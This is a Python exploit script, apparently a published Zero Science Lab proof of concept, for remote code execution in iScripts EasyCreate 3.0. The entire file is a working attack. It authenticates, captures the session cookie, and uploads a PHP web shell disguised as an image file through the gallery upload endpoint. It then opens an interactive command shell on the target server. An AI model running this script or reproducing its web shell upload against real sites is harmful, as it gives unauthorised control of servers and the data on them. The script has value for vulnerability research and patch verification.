version = '3.0'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
import requests, httplib
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
global file
file = 'abcde2'
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------------------@
|iScripts EasyCreate 3.0 Remote Code Execution Exploit|
|ID: ZSL-2016-5297|
| Copyleft (c) 2016, Zero Science Lab |
@-------------------------------------------------------------@
'''
if len(sys.argv) < 1:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
opener2.open('http://'+host+'/easycreate/demo/login.php')
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'vuser_login' : username,
'vuser_password' : password,
})
login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
auth = login.read()
if re.search(r'Invalid username and', auth):
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
output = response.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, field_name, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((field_name, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: application/x-msdownload',
'',
body,
]
for field_name, filename, content_type, body in self.files
)
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_file('userImages', 'abcde2.php4',
fileHandle=StringIO('<?php system(\$_GET[\\\'cmd\\\']); ?>'))
request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
request.add_header('Accept-Language', 'en-US,en;q=0.5')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Connection', 'keep-alive')
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
request.add_header('Accept-Encoding', 'gzip, deflate')
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
output = response.read()
for line in output.splitlines():
if file in line:
filename = str(line.split("=")[2:])[3:84]
print filename
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener2.open(filename+'cmd='+cmd)
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()